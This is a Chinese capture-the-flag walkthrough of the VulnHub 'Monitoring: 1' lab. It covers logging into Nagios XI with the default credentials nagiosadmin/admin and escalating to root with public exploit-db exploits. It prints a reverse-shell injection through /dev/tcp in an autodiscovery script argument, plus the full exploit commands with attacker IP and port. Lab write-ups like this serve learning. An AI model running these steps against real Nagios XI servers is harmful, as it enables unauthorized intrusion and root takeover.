码农知识堂 - 1000bd
  •   Python
  •   PHP
  •   JS/TS
  •   JAVA
  •   C/C++
  •   C#
  •   GO
  •   Kotlin
  •   Swift
  • vulnhub Monitoring: 1


    渗透思路:

    nmap扫描 ---- 默认用户名+弱密码登录Nagios XI ---- 利用Nagios XI 5.6.5的RCE漏洞获得root的shell

    环境信息:

    靶机:192.168.101.84

    攻击机:192.168.101.34

    具体步骤:

    1、nmap扫描

    sudo nmap -sV -sC -p- 192.168.101.84

    扫描到端口22、25、80、389、443、5667

    2、默认用户名+弱密码登录Nagios XI

    浏览器访问http://192.168.101.84/,发现是Nagios XI。

    点击上图中的Access Nagios XI按钮,来到登录页面http://192.168.101.84/nagiosxi/login.php?redirect=/nagiosxi/index.php%3f&noauth=1

    在网上查到Nagios XI的默认用户是nagiosadmin,尝试使用该用户和常见弱密码登录,发现该用户的密码是弱密码admin。

    成功登录后,发现Nagios XI版本是Nagios XI 5.6.0

    3、利用Nagios XI的RCE漏洞getshell(可以省略)

    在exploit-db上查找Nagios XI,找到exp:Nagios XI 5.7.X - Remote Code Execution RCE (Authenticated) - PHP webapps Exploit

    下载exp,并根据exp中的用法提示在攻击机上执行:

    1. nc -nlvp 8888
    2. python3 49422.py http://192.168.101.84 nagiosadmin admin 192.168.101.34 8888

    即可在攻击机nc监听端口上获得靶机www-data用户的反弹shell

    4、利用Nagios XI 5.6.5的RCE漏洞获得root的shell

    靶机上执行sudo -l发现www-data可以在不输入密码的情况下以root身份执行8条命令,其中有4条和Nagios XI相关,另外4条用ls -al命令观察后发现当前用户都没有写权限,所以很可能提权还是和Nagios XI有关。

    google上搜索“nagios xi privilege escalation”

    首先在[R2] Nagios XI Multiple Vulnerabilities - Research Advisory | Tenable®查找到一个proof:

    sudo php /usr/local/nagiosxi/html/includes/components/autodiscovery/scripts/autodiscover_new.php --addresses='127.0.0.1/0;/bin/bash -i >& /dev/tcp/192.168.101.34/4444 0>&1;'

    尝试之后发现不好使,可能这个漏洞在靶机的版本上已经修复了。

    然后又查找到和/usr/local/nagiosxi/html/includes/components/profile/getprofile.sh相关的一个exp:

    Nagios XI 5.6.5 - Remote Code Execution / Root Privilege Escalation - PHP webapps Exploit

    这个exp真是能用而不好用,愁死我了-_-|||

    用法是,攻击机上nc监听某个端口,比如8888

    然后执行:

    php 47299.php --host=192.168.101.84 --ssl=false --user=nagiosadmin --pass=admin --reverseip=192.168.101.34 --reverseport=8888

    我在执行过程中总共遇到3个问题

    1、Call to undefined function curl_init()

    2、cookie.txt already exists - delete prior to running

    3、PHP Fatal error: Uncaught Error: Class "DOMDocument" not found in /home/kali/47299.php:51

    解决方法分别如下:

    问题一:

    sudo apt-get install php-curl

    问题二:

    注释掉exp中函数checkCookie()相关代码

    问题三:

    sudo apt-get install php-dom

    成功执行exp后,攻击机nc监听端口获得靶机root用户反弹shell,并在/root下找到proof.txt

  • 相关阅读:
    stm32f4_奇怪的bug_串口数据错乱,一个串口收到另一个串口的数据
    ArmSom---SPI开发指南
    程序员的十级孤独,你体会过几级
    网络安全笔记6——数字证书与公钥基础设施
    功能基础篇6——系统接口,操作系统与解释器系统
    MCU功耗测量
    Mysql 横向数据表变纵向数据表
    Easyui DataGrid combobox联动下拉框内容
    yolov5-tracking-xxxsort yolov5融合六种跟踪算法(三)--目标跟踪
    树上问题——树的直径
  • 原文地址:https://blog.csdn.net/elephantxiang/article/details/125859470
  • 最新文章
  • 攻防演习之三天拿下官网站群
    数据安全治理学习——前期安全规划和安全管理体系建设
    企业安全 | 企业内一次钓鱼演练准备过程
    内网渗透测试 | Kerberos协议及其部分攻击手法
    0day的产生 | 不懂代码的"代码审计"
    安装scrcpy-client模块av模块异常,环境问题解决方案
    leetcode hot100【LeetCode 279. 完全平方数】java实现
    OpenWrt下安装Mosquitto
    AnatoMask论文汇总
    【AI日记】24.11.01 LangChain、openai api和github copilot
  • 热门文章
  • 十款代码表白小特效 一个比一个浪漫 赶紧收藏起来吧!!!
    奉劝各位学弟学妹们,该打造你的技术影响力了!
    五年了,我在 CSDN 的两个一百万。
    Java俄罗斯方块,老程序员花了一个周末,连接中学年代!
    面试官都震惊,你这网络基础可以啊!
    你真的会用百度吗?我不信 — 那些不为人知的搜索引擎语法
    心情不好的时候,用 Python 画棵樱花树送给自己吧
    通宵一晚做出来的一款类似CS的第一人称射击游戏Demo!原来做游戏也不是很难,连憨憨学妹都学会了!
    13 万字 C 语言从入门到精通保姆级教程2021 年版
    10行代码集2000张美女图,Python爬虫120例,再上征途
Copyright © 2022 侵权请联系2656653265@qq.com    京ICP备2022015340号-1
正则表达式工具 cron表达式工具 密码生成工具

京公网安备 11010502049817号